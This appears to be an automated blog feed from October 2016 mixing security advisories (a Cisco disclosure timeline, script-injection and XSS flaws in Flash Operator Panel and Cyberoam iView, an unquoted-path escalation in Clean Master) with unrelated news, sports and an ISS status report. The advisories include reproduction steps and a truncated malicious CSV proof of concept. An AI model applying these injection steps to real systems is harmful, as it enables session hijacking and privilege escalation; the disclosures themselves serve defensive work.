/usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 43 Mojo::Reactor::EV::__ANON__('EV::IO=SCALAR(0x10667cc8)', 3) called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 24 eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 24 Mojo::Reactor::EV::start('Mojo::Reactor::EV=HASH(0x88c8ca8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/IOLoop.pm line 130 Mojo::IOLoop::start('Mojo::IOLoop=HASH(0x88c8a58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Prefork.pm line 214 Mojo::Server::Prefork::_spawn('Mojo::Server::Prefork=HASH(0x8349e58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Prefork.pm line 122 Mojo::Server::Prefork::_manage('Mojo::Server::Prefork=HASH(0x8349e58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Prefork.pm line 96 Mojo::Server::Prefork::run('Mojo::Server::Prefork=HASH(0x8349e58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Hypnotoad.pm line 77 Mojo::Server::Hypnotoad::run('Mojo::Server::Hypnotoad=HASH(0x8953e50)', '/var/sf/bin/mojo_server.pl') called 4. Mitigation and Remediation Recommendation The vendor has addressed this vulnerability in their Support Center as Bug ID CSCva30631. Vendor acknowledgement available at: http://ift.tt/2dtu8lY 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. 2016.06.30 - Cisco acknowledges receipt of vulnerability report. 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for this vulnerability and for 3 others reported in the same product. 2016.08.12 - 30 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.02 - 45 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.09 - KoreLogic asks for an update on the status of the remediation efforts. 2016.09.15 - Cisco confirms remediation is underway and soon to be completed. 2016.09.28 - Cisco informs KoreLogic that the remediation details will be released publicly on 2016.10.05. 2016.10.05 - Public disclosure. 7. Proof of Concept See Technical Description The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://ift.tt/18BcYvD KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. http://ift.tt/292hO8r Our public vulnerability disclosure policy is available at: http://ift.tt/299jOzg

Source: Gmail -> IFTTT-> Blogger

XMLGold Introduces Anonymous Prepaid Credit Cards

XMLGold Introduces Anonymous Prepaid Credit Cards. Information contained on this page is provided by an independent third-party content provider.

from Google Alert - anonymous http://ift.tt/2cTZcr2
via IFTTT

BREAKING! Another NSA Contractor Arrested For Stealing 'Secret' Documents

Another Edward Snowden? The FBI has secretly busted another National Security Agency (NSA) contractor over a massive secret data theft. The United States Justice Department charged Harold Thomas Martin, 51, with theft of highly classified government material, including "source codes" developed by the NSA to hack foreign government, according to a court complaint unsealed on Wednesday. <!--


from The Hacker News http://ift.tt/2dxSARm
via IFTTT

TalkTalk Telecom Ordered to Pay Record £400,000 Fine Over 2015 Data Breach

TalkTalk, one of the biggest UK-based Telecoms company with 4 million customers, has been issued with a record £400,000 ($510,000) fine for failings to implement the most basic security measures to prevent the hack that made global headlines last year. The penalty has been imposed by the Information Commissioner's Office (ICO) over the high-profile cyber attack occurred in the company last


from The Hacker News http://ift.tt/2e2yrWh
via IFTTT

NFL: Family of Ravens fan who suffered serious brain injury in assault Sunday "encouraged" by progress - Baltimore Sun (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

MLB: Toronto police are investigating a fan's toss of a beer can at Orioles' Hyn Soo Kim in Tuesday's AL wild-card game (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Create an anonymous callback function as the second argument to the service method call.

Create an anonymous callback function as the second argument to the service method call. (AngularJS). This is step two of the challenge and I'm ...

from Google Alert - anonymous http://ift.tt/2drDYHe
via IFTTT

ISS Daily Summary Report – 10/04/2016

ENERGY (Astronaut’s Energy Requirement for Long-Term Space Flight): Today, FE-5 completed Day 6 of the 11 day ENERGY experiment. As part of today’s activities, he continued logging his dietary intake and wearing the armband that monitors his activities.  The Energy investigation measures an Astronaut’s Energy Requirements for Long-Term Space Flight, a crucial factor needed for sending the correct amount of the right types of food with space crews. Astronauts often lose body mass with extended stays in space for reasons that remain unclear, although increased exercise as a microgravity countermeasure may be a factor. Knowing details of astronaut metabolism and activity, combined with other conditions, will help ensure that crews are properly nourished on long missions.  Wet Lab Ribonucleic Acid (RNA) SmartCycler: FE-6 conducted a test fill of COTS Smart Tubes to determine whether they could be filled in microgravity without the spilling out of fluids due to ricochet force. The Wet Lab RNA SmartCycler is a research platform for conducting real-time quantitative gene expression analysis aboard the ISS. The system enables spaceflight genomic studies involving a wide variety of biospecimen types in the unique microgravity environment of space. Personal Carbon Dioxide (CO2) Monitor: FE-5 attached 4 Personal CO2 Monitors to various locations on his clothes, and then wore them for several hours. He then removed the monitors and downloaded data from them. The Personal CO2 Monitor demonstrates a new capability to continuously monitor the astronauts’ immediate surroundings on the ISS.  All human spacecraft must be designed with environmental control systems that remove CO2 from the air that their crews breathe, but the space environment can still lead to “pockets” of CO2 that are difficult to detect and remove. The Personal CO2 Monitor is a demonstration of a system capable of unobtrusively collecting and downlinking individual crew members’ CO2 exposure for up to months at a time.  The Personal CO2 Monitor also demonstrates use of the Modular Wearable Architecture Base Board, which will support rapid certification of wearable devices in the future. Cygnus Offset Grapple On-Board Training (OBT):  In preparation for Cygnus arrival FE-5 and FE-6 practiced vehicle captures with the Space Station Remote Manipulator System (SSRMS), which had been positioned at the Permanent Multipurpose Module (PMM) Flight Releasable Grapple Fixture (FRGF) High Hover position in preparation for the training. Following the training, the crew participated in a conference with ground teams to discuss the training session and address any questions.  47 Soyuz Survey:  FE-6 downlinked images, taken from the Cupola and Docking Compartment 1 (DC1), of the 47S descent module, currently docked at Mini Research Module-1 (MRM-1).  This is a routine survey performed prior to the Soyuz spacecraft departure from the ISS.  Short Extravehicular Mobility Unit (SEMU) 3006 Checkout:  Earlier today FE-6 performed a checkout of SEMU 3006, this checkout is required when a new SEMU arrives onboard ISS prior to it being used for an EVA.  FE-6 performed a nominal leak check of SEMU 3006.  Due to a bad connection between the SEMU and the Space Station Computer (SSC) the data transmission portion of the checkout will need to be rescheduled.  Node 3/Treadmill 2 (T2) Internal Thermal Control System (ITCS) Moderate Temperature Loop (MTL) Line Inspection:  An inspection of the T2 MTL hoses in 2011 reveal minor damage to the hoses where they emerge from the standoff.  Earlier today FE-6 inspected and photographed the hoses to allow ground specialist to assess if there has been any significant change in the hoses status.    Today’s Planned Activities All activities were completed unless otherwise noted. Verification of anti-virus scan results on Auxiliary Computer System (ВКС) laptops ENERGY Diet Log of Breakfast Wet Lab RNA SmartCycler Drill Battery Check Conference of Search and Rescue (ГПСК) specialists with returning crew (S-band) EMU 3006 Post Launch Checkout Part 1 Tropical Cyclone Hardware Closeout Regenerative Environmental Control and Life Support System (RGN) WSTA Fill OTKLIK. Hardware Monitoring Acoustic Dosimeter Setup Day 2 Condensate Water Processor (СРВ-К2М) R&R JEM System Laptop Terminal Reboot ISS CREW/SSIPC Management CONFERENCE On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test Robotics Work Station (RWS) Display and Control Panel (DCP) Checkout Maintenance Activation of Spare Vozdukh Atmosphere Purification System Emergency Vacuum Valves [АВК СОА] (004173R, СМ1РО_3_321_1, in bag II-1/256-1, enclosure for АВК (007223R)) Robotics Work Station (RWS) Display and Control Panel (DCP) Checkout EMU 3006 Post Launch Checkout Part 2 Test activation of Vozdukh Atmosphere Purification System Emergency Vacuum Valves [Cancelled] Flushing Progress 433 (DC1) Rodnik H2O Tank 1 Connector В1 Regenerative Environmental Control and Life Support System (RGN) WSTA Fill T2 Moderate Temperature Loop (MTL) ITCS Line Wear Inspection ISS O2 Repress from Progress 432 [AO] СРПК Section 1 (start) ENERGY Diet Log of Lunch ISS O2 Repress from Progress 432 [AO] СрПК Section 1 (terminate) Photo TV Soyuz Imagery Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ Personal CO2 Monitor Payload On Board Training N1 Nadir Hatch to Unlatch Hardstop Personal CO2 Monitor iPad Application Install СОЖ maintenance Personal CO2 Monitor MultiDevice Don Public Affairs Office (PAO) High Definition (HD) Config LAB Setup PAO Preparation Public Affairs Office (PAO) Event in High Definition (HD) – Lab IMS Delta File Prep On-board Training (OBT) Cygnus Offset Grapple Onboard Training (OBT) SSRMS Debrief Conference CONTENT. Experiment Ops Personal CO2 Data Collection Wet Lab RNA SmartCycler Tube Fill Test Personal CO2 Monitor Crew Survey FLUID SHIFTS. Dilution Measures Setup ENERGY Diet Log of Dinner Completed Task List Items None  Ground Activities All activities were completed unless otherwise noted. Battery 4B2 Reconditioning SSRMS Powerup and Maneuver to Offset Grapple Position Three-Day Look Ahead: Wednesday, 10/05: Fluid Shifts, Vascular Echo Ultrasound, OGS Flow Measurement Thursday, 10/06: SPHERES preps, MSL SCA Exchange, Fluid Shifts, ELF Troubleshooting Friday, 10/07: SPHERES-Slosh Run, MSPR Leak Check, Emergency OBT Delta Review QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node […]

from ISS On-Orbit Status Report http://ift.tt/2e1Hd6U
via IFTTT

[FD] Flash Operator Panel 2.31.03 - CSV Persistent Vulnerability

Document Title: =============== Flash Operator Panel 2.31.03 - CSV Persistent Vulnerability References (Source): ==================== http://ift.tt/2d2Jr45 Release Date: ============= 2016-10-05 Vulnerability Laboratory ID (VL-ID): ==================================== 1908 Common Vulnerability Scoring System: ==================================== 3.6 Product & Service Introduction: =============================== The most comprehensive and affordable reporting and realtime monitor package for Asterisk© based Call Centers. A new approach on getting CDR reports for your phone system, centered on the user and call direction. Top lists, Usage pattern and real time view are included. This version works under any Linux flavor (i386, x86_64 and R-Pi3). Versions 1.2, 1.4, 1.6, 1.8, 10, 11 and 12 with the manager interface enabled to asterisk. PHP 5 & MySQL 5: only required for the visual phonebook, call history and recordings interface. (Copy of the Vendor Homepage: http://ift.tt/2dreeL8 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a script code inject web vulnerability in the official Flash Operator Panel v2.31.03. Vulnerability Disclosure Timeline: ================================== 2016-10-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Nicolas Gudino (Asternic) Product: Flash Operator Panel 2 - User Control Panel (Web-Application) CentOS 2.31.03, Debian 2.31.03 & RPI-ARM 2.30.03 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A script code inject and cross site web vulnerability has been discovered in the Flash Operator Panel v2.31.03. The issue allows an attacker to inject own malicious script code to the application-side of the vulnerable module. The vulnerability is located in all the csv file contact input parameters. Remote attackers are able to generate a malicious csv contact file with malicious included script code to manipulate the contacts module on import. The attack requires the exchange of the contacts csv file during the import/export. The encode of the import and export is insecure performed, thus results in a persistent execution in the contacts module of the fop2 user control panel. The request method to inject is POST and the attack vector is located on the application-side of the web-application. The execute occurs each time the admin visits the main contacts module via settings. The security risk of the issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6. Exploitation of the vulnerability requires a low privileged web-application user account and no user interaction. Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context. Request Method(s): [+] POST Vulnerable Modul(s): [+] Contacts - Import CSV Vulnerable Parameter(s): [+] id [+] firstname [+] lastname [+] company [+] address [+] phone1 [+] phone2 [+] email [+] picture Proof of Concept (PoC): ======================= The script code inject web vulnerability can be exploited by the local import function of the web-application with local user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exploit (.csv) PoC: Visual_Phonebook.csv id,firstname,lastname,company,address,email,phone1,phone2,picture 1,">""
  • A

  •  


    Source: Gmail -> IFTTT-> Blogger
  • [FD] Cyberoam iview UTM v0.1.2.7 - (Ajax) XSS Web Vulnerability

    Document Title: =============== Cyberoam iview UTM v0.1.2.7 - (Ajax) XSS Web Vulnerability References (Source): ==================== http://ift.tt/2dJ106O Release Date: ============= 2016-10-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1850 Common Vulnerability Scoring System: ==================================== 3.3 Product & Service Introduction: =============================== Enterprises and MSSPs need a solution that gives them visibility into network activities and security posture from a single location. Cyberoam iView offers centralized logging and reporting of network and user activity over multiple devices across distributed locations for security events. It offers logs and reports of Cyberoam network security appliances, along with other UTMs and NGFW appliances, routers and switches. (Copy of the Vendor Homepage: http://ift.tt/2d2Ir00 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a client-side cross site vulnerability in the official iview Cyberoam utm v0.1.2.7 appliance web-application. Vulnerability Disclosure Timeline: ================================== 2016-05-24: Researcher Notification & Coordination (Lawrence Amer - Vulnerability Laboratory) 2016-05-25: Vendor Notification (Cyberoam Security Team) 2016-09-20: Vendor Fix/Patch (Cyberoam Security Team) 2016-10-01: Acknowledgement & Bug Bounty (Cyberoam iview Developer Team) 2016-10-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Sophos Product: iview Cyberoam - Appliance (Web-Application) 0.1.2.7 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client side cross site scripting web vulnerability has been discovered in the official iview Cyberoam utm v0.1.2.7 appliance web-application. The client-side web vulnerability allows remote attackers to inject own malicious script codes to client-side browser to application requests. The vulnerability is located in the module `Dashboards - Custom Dashboard - Critria`. Remote attackers and low privileged web-application user accounts are able to inject own malicious script code context in the search input for parameters [username,sourcehost,emailaddr sender, emailaddr recipent). The data of the POST method request in the Body is bypassing the input validation and executes without a secure encode. The request runs through the data type "json". The security risk of the client-side cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the non-persistent input validation vulnerability requires no privileged web-application user account or a low privileged web-application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected or connected application modules. Request Method(s) [+] POST - [json] Vulnerable Module(s): [+] AjaxController [+] Dashboard - Custom Dashboard - Critria Vulnerable Parameter(s): [+] username [+] sourcehost [+] emailaddr sender [+] emailaddr recipent Proof of Concept (PoC): ======================= The client-side web vulnerability can be exploited by remote attackers or low privileged web-application user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the iview url localhost:8080/iview 2. After that, use the critria search in the following module Note: Dashboards - Custom Dashboard - (critria input) 3. Type in the search input field a java script payload 4. Successful reproduce of the vulnerability!

    Source: Gmail -> IFTTT-> Blogger

    [FD] Clean Master v1.0 - Unquoted Path Privilege Escalation

    Document Title: =============== Clean Master v1.0 - Unquoted Path Privilege Escalation References (Source): ==================== http://ift.tt/2d2yU9q Release Date: ============= 2016-10-05 Vulnerability Laboratory ID (VL-ID): ==================================== 1968 Common Vulnerability Scoring System: ==================================== 4 Product & Service Introduction: =============================== Clean Master Cleaner is a powerful application dedicated to the cleaning of certain content Android terminal. It is able to remove all traces of activities performed on the Smartphone to free up space and increase performance. This app is able to best improve the security system of the device. (Copy of the Vendor Homepage: http://www.cmcm.com/ ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered an unquoted service path privilege escalation vulnerability in the Clean Master v1.0 software. Vulnerability Disclosure Timeline: ================================== 2016-10-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== CMCM Product: Clean Master - Software (Client) 1.0 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ The application suffers from an unquoted search path issue in the official Clean Master v1.0 software client. The issue allows authorized but unprivileged local users to execute arbitrary code with system privileges on the active system. The attack vector of the issue is local. The security risk of the software vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.4. Exploitation of the software vulnerability requires a low privilege system user account with restricted access and without user interaction. Successful exploitation of the vulnerability results in system process compromise and further manipulation or exploitation to compromise the local computer operating system. Proof of Concept (PoC): ======================= The issue can be exploited by local attackers with restricted system user account or network access and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

    Source: Gmail -> IFTTT-> Blogger